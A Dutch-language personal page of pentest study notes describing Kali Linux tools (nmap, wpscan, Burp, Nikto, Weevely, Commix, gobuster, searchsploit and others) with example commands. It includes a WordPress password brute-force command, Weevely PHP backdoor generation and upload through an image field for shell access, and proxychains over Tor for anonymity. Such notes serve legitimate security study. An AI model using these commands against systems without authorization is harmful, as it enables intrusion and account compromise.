Wordt ook idle scanning genoemd. We wachten tot er op het doel een poort open gaat of een verbinding geopend wordt.

Tijdens zo'n scan doe je je voor alsof je een machine bent die niets doet. Basically, we are mapping out any trusting relationships between host and guests in order to use those ports:
nmap -Pn -p- -sl kiosk.adobe.com www.h3xnews.org

nbtscan

Kan range van adressen scannen op open poorten die met SMB te maken hebben (bv. 135 en 139), bv. nbtscan 192.168.1.100-150

In de uitvoer van deze scan zie je ook de Netbios naam, en de scan gaat veel sneller dan een vergelijkbare scan met nmap op poorten 139 en 445.

md5sum

ssh-keygen

enum4linux

Bv.: enum4linux -v IP_address

Ik heb het idee dat deze scan tegenwoordig niet veel meer oplevert, omdat hij volgens mij gebruik maakt van 0-sessie (die overal is afgesloten).

Zie Kioptrix 4.

dirb

Hier een uitgebreide handleiding van dirb.

Met deze tool kan je files binnen een web server zoeken, een zgn. web content scanner.

Webservers bevinden zich meestal in /var/www

Het werkt via een brute force attack, gebaseerd op een dictionary.

Het commando ziet er als volgt uit:
dirb url_base wordlist(s) options

De simpelste vorm is dirb IP-address

Interessante files zouden bv. phpinfo.php (informatie over PHP-configuratie) en robots.txt (mappen waarvan de sitebeheerder niet wil dat Google ze indexeert).

Meer info hier.

Angry-ip

Sparta

Dit is een vulnerability scanner. Deze tool start onder water een heleboel andere, zoals nmap, nikto, etc.

Vega

Dit is web application vulnerability scanner.

Hij zit niet standaard in Kali, maar kan met apt install vega toegevoegd worden.

Je moet eerst een target definiëren, en daarna welke modules je wilt gebruiken.

Dit soort scan kan een denial of service veroorzaken op een uplink met kleine bandbreedte.

wpscan

Scan op vulnerabilities in Wordpress.

Help info met wpscan -h

Update wpscan:
wpscan --update

Hoe herken je een WordPress site?

Hoe kan je zien of een site Wordpress gebruikt? Meestal staat onderaan 'Powered by Wordpress'.

Een andere methode is kijken naar de code, en zoeken naar 'wp' (bv. 'wp-includes', 'wp-content').

Non-intrusive scan

Non-intrusive scan:
wpscan --url IP_address/wordpress
Vraag over updaten db met 'y' beantwoorden.

Enumerating Usernames

Gebruik WPScan om geldige usernames te vinden.

Enumerate all users:
wpscan --url https://IP_address/wordpress --enumerate u

wpscan --url url
-e options (p voor plugins, ap voor all plugins, vp vulnerable plugins, t voor themes)

Bruteforcing login

wpscan --url URL --passwords wordlist --usernames [user|'user_list'] --max-threads 5

Discovering Plugins and More

Scan vulnerable plugings: wpscan --url URL --enumerate vp
Scan all plugings & themes: wpscan --url URL --enumerate at, ap

Nessus

Je kan dit programma starten met /etc/init.d/nessusd start

Je kan nessus via de browser gebruiken door naar https://127.0.0.1:8834 te gaan.

Nexpose

Burp suite

Wordt gebruikt voor penetration testing against web applications.

Demo o.a. in CompTIA Pentest cursus van James Dion.

Burp onderschept HTTP-verkeer voordat het verder gestuurd wordt, zodat je er dingen in kan veranderen.

Eerst moet je via tabbladen Proxy en Options een proxy server instellen. Standaard staat die op 127.0.0.1, poort 8080.

Daarna zet je proxy settings in browser (bv. in Firefox via Options - Advanced - Network - Settings).

Daarna moet je het goede certificaat installeren, via Options - Advanced - Certificates - View Certificates - Import). Het certificaat heet cacert.der (je kan zorgen dat ie bij Recently used staat door eerst in de browser het adres burp in te tikken). Je moet vinkjes zetten in alle 3 Trust this CA... checkboxes.

Dirbuster

Brute force tool voor directories en filenamen op web/application servers.

Gebruik je wanneer sensitive directories of administration logging page niet publicly disclosed zijn.

Het programma is een multithreaded Java application.

W3AF

Web Application Attack and Audit Framework.

Tool om web app vulnerabilities mee te vinden.

W3AF

Web Application Attack and Audit Framework.

Tool om web app vulnerabilities mee te vinden.

Nikto

Nikto is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software, and other issues. It performs generic and server types of specific checks.

Dit is een open source web server (vulnerability) scanner. Hij identificeert verouderde versies, en foute configuraties van de server, zoals multiple index files en HTTP server options. Hij zoekt naar kwetsbaarheden in server, XSS, en webapplicaties als gallery/php.

Help info

In de Nikto wiki vind je meer info.

Met nikto -h of nikto -H (uitgebreider).

Voorbeeld

nikto -host URL -output output_file -format HTM

In het rapport kan je zien hoeveel requests er verstuurd zijn, en hoeveel findings er zijn.

Webinspect

redfang / fang

Hiermee kan je nondiscoverable Bluetooth devices vinden.

Een general scan kan heel lang duren: fang -s

Met Redfang gaan we de device manufacturer codes vinden: fang -l
Voor Apple is het bv. 000393. Dan ga je naar Google, en tik je: 000393 vulnerability

BlueMaho

BlueMaho is GUI based scanning and exploitation tool. Installeren via git clone git://git.kali.org/packages/bluemaho.git
Ga dan naar folder en ./bluemaho.py

BlueSnarfer

BlueRanger

Weevely

In Kali zit een tool Weevely, waarmee je backdoors kunt genereren om naar een site te uploaden. Voorbeeld:
weevely generate abcdef /root/shell.php

In dit geval wordt er een bestand shell.php gegenereerd en op de aangegeven plek gezet, en het password op de file is abcdef

De volgende stap is dat je het bestand op de site krijgt, bv. via de plek waar je eigenlijk een image moet uploaden.

Als dat lukt kan je daarna met weevely er contact mee maken:
weevely adres van file op server abcdef

Je krijgt dan een weevely-prompt, en kan Linux commando's intikken. Met bv. id kan je zien wie je bent (www-data als het goed is), en met uname -a om welke machine het gaat.

Maltego

Maltego is een grafische tool in Kali Linux. De 1e keer moet je wel een account aanmaken.

Maltego is proprietary software widely used for OSINT. Kali Linux includes the Community Edition of Maltego, which can be used for free with some limitations after completing the online registration. Maltego performs transforms over pieces of data (for example, email addresses, and domain names) to obtain more information, and it displays all of the results as a graph showing relationships among different objects. A transform is a search of public information about a particular object, for example, searches for IP addresses related to a domain name or social media accounts related to an email address or person's name.

Daarna vind je in de rechterhelft van het scherm een aantal plugins (transforms), zoals Shodan.

Als je een nieuwe graph aanmaakt, kan je links kiezen uit een Entity Palette, zoals Devices en Infrastructure.

Rechts plaats je dan de dingen waar je informatie over wilt hebben, en je vult de correcte waarden in. Als er dan met rechts op klikt, kan je kiezen welke transform je er op los wilt laten.

Met het muiswiel zoom je in en uit, door rechts te klikken in de graph kan je het beeld verschuiven.

Related entities

Je kan in de graph bv. het domein microsoft.com plaatsen, en de persoon Bill Gates, en ze dan met een lijntje met elkaar verbinden. Het worden dan related entities.

proxychains

Om dingen anoniem te doen?!

apt-get install -y tor, dan:
apt-get install -y proxychains

Start tor, en kijk dan op welke poort het actief is, met netstat -tanp | grep tor

Je kan de proxychains config file editen, en de socks 4 examples uncommenten: nano /etc/proxychains.conf

Commix

Tool for command based injection and exploitation techniques.

Stel dat we alles over een target willen vinden, dan doen we: commix --all URL --level=3 (3 is hoogste level).

Uniscan

Opties van Uniscan:

Dus: uniscan -u URL --qwedsjg

CMSmap

Installeren met: git clone https://github.com/Dionach/CMSmap.git

Skipfish

Skipfish is a vulnerability scanner that begins by creating an interactive site map for the target website, using a recursive crawl and prebuilt dictionary. Each node in the resulting map is then tested for vulnerabilities. Speed of scanning is one of its major features that distinguishes it from other web vulnerability scanners. It is well-known for its adaptive scanning features, for more intelligent decision making from the response received in the previous step. It provides a comprehensive coverage of the web application in a relatively short time. The output of Skipfish is in the HTML format.

OpenVAS

The Open Vulnerability Assessment Scanner (OpenVAS) is a network vulnerability scanner in Kali Linux. A penetration test should always include a vulnerability assessment of the target system, and OpenVAS does a good job of identifying vulnerabilities on the network side. OpenVAS is a fork of Nessus, one of the leading vulnerability scanners in the market, but its feeds are completely free and licensed under GPL. The latest version of Kali Linux doesn't include OpenVAS, but it can be easily downloaded and installed using APT as follows:
$ apt-get install openvas Once installed in Kali Linux, OpenVAS requires an initial configuration before you start using it. Go to Applications | Vulnerability Analysis, and select OpenVAS initial setup. Kali Linux needs to be connected to the internet to complete this step as the tool downloads all of the latest feeds and other files. At the end of the setup, a password is generated, which is to be used during the login of the GUI interface:

You can now open the graphical interface by pointing your browser to https://127.0.0.1:9392
Accept the self-signed certificate error, and then log in with the admin username and the password generated during the initial configuration. OpenVAS is now ready to run a vulnerability scan against any target. You can change the password after you log in, by navigating to Administrations | Users and selecting the edit user option (marked with a spanner) against the username. The GUI interface is divided into multiple menus, as described here.

SQLNinja

SQLNinja is a tool written in Perl, and it can be used to attack Microsoft SQL server vulnerabilities and gain shell access.

Amap

Vergelijkbaar met nmap

You can invoke Amap using the -bqv option, which will only report the open ports and print the response received in ASCII and some detailed information related to it.

DNSEnum

DNSEnum is a command-line tool that automatically identifies basic DNS records such as MX, mail exchange servers, NS, domain name servers, or A—the address record for a domain. It also attempts zone transfers on all identified servers, and it has the ability to attempt reverse resolution (that is, getting the hostname given an IP address) and brute forcing (querying for the existence of hostnames in order to get their IP address) of subdomains and hostnames.

Fierce

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.

Fierce uses zone transfer, dictionary attacks, and reverse resolution to gather hostnames and subdomains along with the IP addresses of a domain, and it has the option to search for related names (for example, domain company.com, corpcompany.com, or webcompany.com).

Gebruik: fierce -dns domain

DNSRecon

This tool lets you gather DNS information through a number of techniques including zone transfer, dictionary requests, and Google search. In the following command, we will do an enumeration by zone transfer (-a), reverse analysis of the IP address space obtained by Whois (-w), and Google search (-g):
dnsrecon -a -g -w -d zonetransfer.me

Findmyhash

findmyhash kan een heleboel soorten hashes aan. Basic syntax: python /usr/bin/findmyhash algorithm options (het stuk voor findmyhash kan je weglaten).

gobuster

Directory bruteforcing tool.

Bv.: gobuster dir -u http://192.168.0.149/ -x php,txt,bak,old,zip,gz,conf,cnf,js -w /home/kali/Desktop/Big.txt -t 40

Nemesis

Nemesis is a program for generating packets on the network layer level (among others the protocols ICMP and IP), the transport level (TCP and UDP protocols), and the data connector layer (Ethernet and APR protocols); and inserting them into the network.

The software can be installed as follows:

tar -zxvf nemesis-1.4beta3.tar.gz cd nemesis-1.4beta3 ./configure make make install (as root)

Searchsploit

Allow you to search through exploits and shellcodes using one or more terms from Exploit-DB.

searchsploit [options] term1 [term2] ... [termN]

Meestal is het voldoende om iets te doen in de geest van: searchsploit proftpd 1.3.3c

OPTIONS -c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe). -e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies "-t"]. -h, --help Show this help screen. -j, --json [Term] Show result in JSON format. -m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory. -o, --overflow [Term] Exploit titles are allowed to overflow their columns. -p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible). -t, --title [Term] Search JUST the exploit title (Default is title AND the file's path). -u, --update Check for and install any exploitdb package updates (deb or git). -w, --www [Term] Show URLs to Exploit-DB.com rather than the local path. -x, --examine [EDB-ID] Examine (aka opens) the exploit using $PAGER. --colour Disable colour highlighting in search results. --id Display the EDB-ID value rather than local path. --nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml). Use "-v" (verbose) to try even more combinations --exclude="term" Remove values from results. By using "|" to separated you can chain multiple values. e.g. --exclude="term1|term2|term3".

    Tweeten

© Henk Dalmolen
Reageer via E-mail (dalmolen@xs4all.nl)

Deze pagina is voor het laatst gewijzigd op: 30-01-23 22:18:22